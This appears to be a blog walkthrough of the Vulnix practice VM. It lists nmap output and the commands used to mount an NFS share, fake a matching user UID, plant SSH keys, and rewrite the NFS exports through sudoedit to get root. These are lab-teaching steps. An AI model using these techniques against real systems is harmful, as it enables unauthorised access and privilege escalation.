Here we have a vulnerable Linux host with configuration weaknesses rather than purposely vulnerable software versions (well at the time of release anyway!)
The host is based upon Ubuntu Server 12.04 and is fully patched as of early September 2012. To Grab a Copy Download Here HackLAB: Vulnix
We always Kick Off with Nmap Scan…….
Nmap -sC -sV -oA nmap <Target-IP>
# Nmap 7.91 scan initiated Thu Jul 15 10:56:44 2021 as: nmap -sC -sV -oA nmap 172.16.139.216 Nmap scan report for 172.16.139.216 Host is up (0.0015s latency). Not shown: 988 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 1024 10:cd:9e:a0:e4:e0:30:24:3e:bd:67:5f:75:4a:33:bf (DSA) | 2048 bc:f9:24:07:2f:cb:76:80:0d:27:a6:48:52:0a:24:3a (RSA) |_ 256 4d:bb:4a:c1:18:e8:da:d1:82:6f:58:52:9c:ee:34:5f (ECDSA) 25/tcp open smtp Postfix smtpd |_smtp-commands: vulnix, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, |_ssl-date: 2021-07-15T12:57:05+00:00; +3h00m01s from scanner time. 79/tcp open finger Linux fingerd |_finger: No one logged on.\x0D 110/tcp open pop3 Dovecot pop3d |_pop3-capabilities: SASL UIDL PIPELINING STLS CAPA RESP-CODES TOP |_ssl-date: 2021-07-15T12:57:05+00:00; +3h00m01s from scanner time. 111/tcp open rpcbind 2-4 (RPC #100000) | rpcinfo: | program version port/proto service | 100000 2,3,4 111/tcp rpcbind | 100000 2,3,4 111/udp rpcbind | 100000 3,4 111/tcp6 rpcbind | 100000 3,4 111/udp6 rpcbind | 100003 2,3,4 2049/tcp nfs | 100003 2,3,4 2049/tcp6 nfs | 100003 2,3,4 2049/udp nfs | 100003 2,3,4 2049/udp6 nfs | 100005 1,2,3 37916/udp6 mountd | 100005 1,2,3 38356/tcp mountd | 100005 1,2,3 41805/tcp6 mountd | 100005 1,2,3 57305/udp mountd | 100021 1,3,4 37121/udp nlockmgr | 100021 1,3,4 40483/udp6 nlockmgr | 100021 1,3,4 44054/tcp6 nlockmgr | 100021 1,3,4 60768/tcp nlockmgr | 100024 1 39121/udp6 status | 100024 1 39196/tcp6 status | 100024 1 48005/udp status | 100024 1 48763/tcp status | 100227 2,3 2049/tcp nfs_acl | 100227 2,3 2049/tcp6 nfs_acl | 100227 2,3 2049/udp nfs_acl |_ 100227 2,3 2049/udp6 nfs_acl 143/tcp open imap Dovecot imapd |_imap-capabilities: more have LOGINDISABLEDA0001 post-login LITERAL+ capabilities STARTTLS LOGIN-REFERRALS listed ID IDLE IMAP4rev1 Pre-login OK ENABLE SASL-IR |_ssl-date: 2021-07-15T12:57:05+00:00; +3h00m01s from scanner time. 512/tcp open exec netkit-rsh rexecd 513/tcp open login 514/tcp open tcpwrapped 993/tcp open ssl/imaps? | ssl-cert: Subject: commonName=vulnix/organizationName=Dovecot mail server | Not valid before: 2012-09-02T17:40:22 |_Not valid after: 2022-09-02T17:40:22 |_ssl-date: 2021-07-15T12:57:04+00:00; +3h00m00s from scanner time. 995/tcp open ssl/pop3s? | ssl-cert: Subject: commonName=vulnix/organizationName=Dovecot mail server | Not valid before: 2012-09-02T17:40:22 |_Not valid after: 2022-09-02T17:40:22 |_ssl-date: 2021-07-15T12:57:04+00:00; +3h00m00s from scanner time. 2049/tcp open nfs_acl 2-3 (RPC #100227) Service Info: Host: vulnix; OS: Linux; CPE: cpe:/o:linux:linux_kernel Host script results: |_clock-skew: mean: 3h00m00s, deviation: 0s, median: 3h00m00s Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Thu Jul 15 10:57:04 2021 -- 1 IP address (1 host up) scanned in 20.52 seconds
So many ports damn and between the box was rated hard i don’t why maybe it because of the many ports seriouly to much talking let start our enumeration. So we are having 11 ports on the target the only port that quickly caught my eyes is
2049 which is the NFS port.
2049 is a client/server system that allows users to access files across a network and treat them as if they resided in a local file directory. Now exploit it it should be easy.
NFS SHARE ON PORT 2049 EXPLOIT
showmount -e 172.16.139.216
Now we know we have a share to mount
/home/vulnix * now let create a folder in our
Now let mount it into the folder we created in
mount -v -t nfs -o vers=3,proto=tcp,nolock 172.16.139.216:/home/vulnix /tmp/vulnix
Note:- You can only mount if you are root.
Mounted on the share folder but when i try to access i got Permission denied even when using root but since we know the username is
vulnix i try creating a fake user on my attacking machine.
FAKE USER WITH THE SAME UID
We know user
vulnix UID is
2008 so it should be easy let hit it.
useradd vulnix usermod -u 2008 vulnix su vulnix
Now we have access but seriouly i got nothing not even a SSH private key hahahhahaha why but it cool since we are user
vulnix let try creating an SSH folder and adding our
authorized_keys which is the
id_rsa public key .
Now back to our attacking machine to generate the key.
ssh-keygen -t rsa
If you follow the process on how to generate the SSH private key and public key just change directory to
Now back to our target.
Now back to our Attacking machine let use the private key to SSH with user
chmod 600 id_rsa ssh -i id_rsa firstname.lastname@example.org
We are in checking
sudo -l .
Seems we can use
sudoedit to modify
Interesting since we can read and write to
/home/vulnix i think it possible to edit it to the root user folder to add our
authorized_keys so we can SSH using root let give it a try.
Now we change
/home/vulnix *(rw,root_squash) to
/root *(rw,no_root_squash) now let go ahead to confirm it.
Boom now let mount the NFS share.
mount -v -t nfs -o vers=3,proto=tcp,nolock 172.16.139.216:/root /tmp/root
Mounted now let change directory to
We have the root flag but nah i wnt to get access to SSH with root now let add our
Now let try to SSH using root with the private key.
We are done and dusted.
Greeting From Muzec